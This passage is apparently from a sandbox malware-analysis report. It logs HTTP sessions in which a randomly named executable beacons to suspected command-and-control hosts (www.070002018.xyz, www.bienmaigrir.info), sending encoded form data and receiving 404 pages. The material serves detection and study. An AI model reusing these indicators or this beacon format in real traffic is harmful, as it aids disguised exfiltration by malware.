                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.2.449930161.97.142.144803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:13:18.212018967 CET624OUTPOST /6m2n/ HTTP/1.1
                                                                                                                          Host: www.070002018.xyz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.070002018.xyz
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.070002018.xyz/6m2n/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 56 79 52 37 78 45 69 51 41 42 6b 6f 30 56 42 6f 55 6a 79 69 75 34 37 4d 58 73 33 74 42 36 48 73 4e 72 38 4f 67 39 54 6f 79 48 72 47 36 6e 4d 6f 36 2f 61 65 75 76 56 39 4b 59 64 4e 2f 58 64 42 4d 5a 32 73 4c 74 53 72 63 72 55 37 75 4f 48 37 51 6d 39 37 2f 59 64 65 2b 56 45 59 50 54 55 64 37 46 4e 4b 76 59 64 43 31 35 4c 48 65 75 68 4c 70 50 46 6c 45 72 57 73 6d 52 48 57 4e 36 2f 5a 35 31 66 7a 6e 74 2b 66 47 5a 4a 4e 64 79 47 56 4c 6d 57 2b 52 69 35 6b 62 64 79 44 75 79 78 39 39 47 46 73 36 79 34 46 34 7a 38 32 46 4a 46 39 76 6f 4d 2f 5a 78 51 4b 4a 7a 50 50 6c 53 65 71 32 67 3d 3d
                                                                                                                          Data Ascii: Mr60=VyR7xEiQABko0VBoUjyiu47MXs3tB6HsNr8Og9ToyHrG6nMo6/aeuvV9KYdN/XdBMZ2sLtSrcrU7uOH7Qm97/Yde+VEYPTUd7FNKvYdC15LHeuhLpPFlErWsmRHWN6/Z51fznt+fGZJNdyGVLmW+Ri5kbdyDuyx99GFs6y4F4z82FJF9voM/ZxQKJzPPlSeq2g==
                                                                                                                          Nov 22, 2024 15:13:19.533786058 CET1236INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:19 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          ETag: W/"66cce1df-b96"
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                          Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                          Nov 22, 2024 15:13:19.533951044 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                          Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.449936161.97.142.144803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:13:20.880209923 CET644OUTPOST /6m2n/ HTTP/1.1
                                                                                                                          Host: www.070002018.xyz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.070002018.xyz
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.070002018.xyz/6m2n/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 56 79 52 37 78 45 69 51 41 42 6b 6f 30 30 78 6f 52 41 61 69 2f 49 37 4e 59 4d 33 74 59 71 47 6e 4e 72 77 4f 67 38 6d 76 79 30 50 47 30 6c 55 6f 37 39 2b 65 2b 2f 56 39 43 34 63 46 79 33 64 65 4d 5a 79 65 4c 70 61 72 63 72 41 37 75 4b 44 37 52 51 31 34 35 59 64 59 6e 46 45 61 4c 54 55 64 37 46 4e 4b 76 59 4a 37 31 39 6e 48 5a 64 35 4c 6f 75 46 6d 4e 4c 57 72 6e 52 48 57 4a 36 2b 65 35 31 66 52 6e 6f 66 36 47 62 78 4e 64 7a 32 56 4c 53 4b 68 59 69 35 69 47 4e 7a 4c 6f 53 6f 4a 39 6d 38 37 77 30 67 71 37 54 38 41 45 50 49 6e 2b 5a 74 6f 4c 78 30 35 55 30 47 37 6f 52 6a 6a 74 6b 6f 30 65 7a 6a 50 5a 41 42 30 32 69 4f 6d 52 33 38 78 45 31 6f 3d
                                                                                                                          Data Ascii: Mr60=VyR7xEiQABko00xoRAai/I7NYM3tYqGnNrwOg8mvy0PG0lUo79+e+/V9C4cFy3deMZyeLparcrA7uKD7RQ145YdYnFEaLTUd7FNKvYJ719nHZd5LouFmNLWrnRHWJ6+e51fRnof6GbxNdz2VLSKhYi5iGNzLoSoJ9m87w0gq7T8AEPIn+ZtoLx05U0G7oRjjtko0ezjPZAB02iOmR38xE1o=
                                                                                                                          Nov 22, 2024 15:13:22.157048941 CET1236INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:21 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          ETag: W/"66cce1df-b96"
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                          Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                          Nov 22, 2024 15:13:22.157167912 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                          Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.2.449944161.97.142.144803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:13:23.551826000 CET10726OUTPOST /6m2n/ HTTP/1.1
                                                                                                                          Host: www.070002018.xyz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.070002018.xyz
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.070002018.xyz/6m2n/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 56 79 52 37 78 45 69 51 41 42 6b 6f 30 30 78 6f 52 41 61 69 2f 49 37 4e 59 4d 33 74 59 71 47 6e 4e 72 77 4f 67 38 6d 76 79 30 48 47 30 55 30 6f 36 64 43 65 73 76 56 39 49 59 63 47 79 33 63 43 4d 64 65 61 4c 70 57 64 63 70 34 37 6f 66 58 37 59 46 56 34 73 6f 64 59 6f 6c 45 66 50 54 55 4d 37 46 39 4f 76 59 5a 37 31 39 6e 48 5a 63 4a 4c 75 2f 46 6d 4c 4c 57 73 6d 52 48 4b 4e 36 2f 35 35 31 47 75 6e 6f 72 41 48 71 52 4e 64 54 6d 56 59 52 69 68 46 53 35 67 48 4e 7a 36 6f 53 55 57 39 6d 67 33 77 30 38 41 37 52 67 41 48 37 56 38 74 37 78 46 59 7a 5a 72 50 58 71 36 7a 67 54 52 73 30 6b 50 64 78 58 30 44 54 39 6e 31 44 66 63 4a 6e 67 79 54 52 6e 58 4d 48 6a 6d 72 30 32 68 77 68 64 6b 43 69 74 4e 69 4f 54 42 34 43 65 57 74 58 6c 30 61 6f 63 76 34 62 69 35 77 2b 33 33 36 54 4c 4a 55 6b 42 51 30 46 6d 64 71 67 35 79 6d 47 5a 76 33 6e 5a 4b 51 71 57 53 50 4c 4b 36 31 36 68 56 77 52 73 73 58 35 6f 49 51 46 48 4a 54 42 4e 31 47 77 62 44 31 33 5a 48 52 38 49 4e 55 36 55 6a 46 33 4a 55 4f 6c 35 35 65 [TRUNCATED]
                                                                                                                          Data Ascii: Mr60=VyR7xEiQABko00xoRAai/I7NYM3tYqGnNrwOg8mvy0HG0U0o6dCesvV9IYcGy3cCMdeaLpWdcp47ofX7YFV4sodYolEfPTUM7F9OvYZ719nHZcJLu/FmLLWsmRHKN6/551GunorAHqRNdTmVYRihFS5gHNz6oSUW9mg3w08A7RgAH7V8t7xFYzZrPXq6zgTRs0kPdxX0DT9n1DfcJngyTRnXMHjmr02hwhdkCitNiOTB4CeWtXl0aocv4bi5w+336TLJUkBQ0Fmdqg5ymGZv3nZKQqWSPLK616hVwRssX5oIQFHJTBN1GwbD13ZHR8INU6UjF3JUOl55evI5C3GWkz1X2yFmOXN5RGMvIPvkgR2m60Ji7CAhLmC0XzY+4cyTh6YC5TiT5XUMOGZJnFBBun2i+EEHJNO/OKNt2cDpvQAc1bgda1Wjiw2kl3MKztK2qnlcpz48mTmmxT/EYFkWvaq3iD6tCaK9Xj98CBD3uAtgVNY9+0UYTbh/B45HH8Mzzt97Yv5mMUBQcy+fWGW7cB4RzEZa1c5KG5Z95vHbfsPMscyfI0eBkl0XmERbhfcyIThHsk6/Eb6zKi6CvRfsN59th3cveUEV4T5fLMbR159b4qAUY27zphw00cmEKAt64mb9VGtsSWK24M8c4Q2XmgDDbtoWXTS0C67S+xoVar9CGtp0Bf0a0HKgI8iL0jt360eUq9zqap76UhRZr4OYVTT+x7t/YV9J1QWHPP5YgGso38tZTbHKeiwEBBF226pICVxaBbMxi0VYW/oeDXnhPmkN+cBa53Iw32x1kkWipVdNS31/qAQCeRiWXNFd9IbSdUqPwhEKg4E5QsrMe7q7lYO1duG2YNrj3hfWU69uUcZBnD3p32jLwQJx1lh9fUnoC1Ds1ZRtiNIig1bm60SLNwk42o1fJDvajPohk0jq6XfEcHhFHCgXUwCLkYho+YRdcUA1/9m8aSBysQi6RN0lqfTviCU6AOXAom7q/xl3e6avK/8 [TRUNCATED]
                                                                                                                          Nov 22, 2024 15:13:24.852082968 CET1236INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:24 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          ETag: W/"66cce1df-b96"
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                          Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                          Nov 22, 2024 15:13:24.852154016 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                          Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          20192.168.2.449951161.97.142.144803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:13:26.245233059 CET356OUTGET /6m2n/?Mr60=Yw5byyKwEzNx0WExUgXfy9WYeOrLRKTUHYwp2f+G51jE3kEn7LG6s/p7OKNy20MANuawYrGFRZxpwvPhYVF0orZ4vi8yKWUq5FVUlLJ03fvmQMl+mrBpOPM=&o6=SpTPojpx7H HTTP/1.1
                                                                                                                          Host: www.070002018.xyz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:13:27.623074055 CET1236INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:27 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Content-Length: 2966
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          ETag: "66cce1df-b96"
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                                          Nov 22, 2024 15:13:27.623101950 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                                                          Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                                                          Nov 22, 2024 15:13:27.623114109 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                                                                          Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          21192.168.2.44996935.220.176.144803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:13:33.694235086 CET633OUTPOST /7yhf/ HTTP/1.1
                                                                                                                          Host: www.bienmaigrir.info
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.bienmaigrir.info
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.bienmaigrir.info/7yhf/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 44 48 51 4a 32 75 6b 72 4d 59 69 44 63 72 4c 54 39 34 47 58 52 74 4b 67 76 49 2f 76 30 6d 78 78 6d 50 43 6d 48 77 66 59 72 79 78 6e 64 31 79 63 6e 47 45 51 45 4f 44 39 75 45 70 6a 32 2b 70 4d 47 6a 41 73 62 6b 44 66 77 6d 49 4f 4b 79 6e 65 4a 68 72 5a 6a 2f 34 61 54 32 39 2f 37 61 42 38 38 4e 71 55 4e 71 48 6a 79 59 36 67 63 64 66 35 78 45 32 35 75 51 4b 35 6e 58 68 30 50 68 35 74 73 50 5a 58 53 64 54 5a 7a 76 72 41 4c 4e 50 68 4f 62 45 54 2b 67 70 30 79 31 75 76 53 37 50 6f 67 51 55 35 47 36 35 39 37 66 41 4a 6d 47 62 67 66 76 38 55 39 6c 50 4c 32 79 70 38 44 46 6a 39 57 41 3d 3d
                                                                                                                          Data Ascii: Mr60=DHQJ2ukrMYiDcrLT94GXRtKgvI/v0mxxmPCmHwfYryxnd1ycnGEQEOD9uEpj2+pMGjAsbkDfwmIOKyneJhrZj/4aT29/7aB88NqUNqHjyY6gcdf5xE25uQK5nXh0Ph5tsPZXSdTZzvrALNPhObET+gp0y1uvS7PogQU5G6597fAJmGbgfv8U9lPL2yp8DFj9WA==
                                                                                                                          Nov 22, 2024 15:13:35.226351976 CET691INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:34 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 548
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
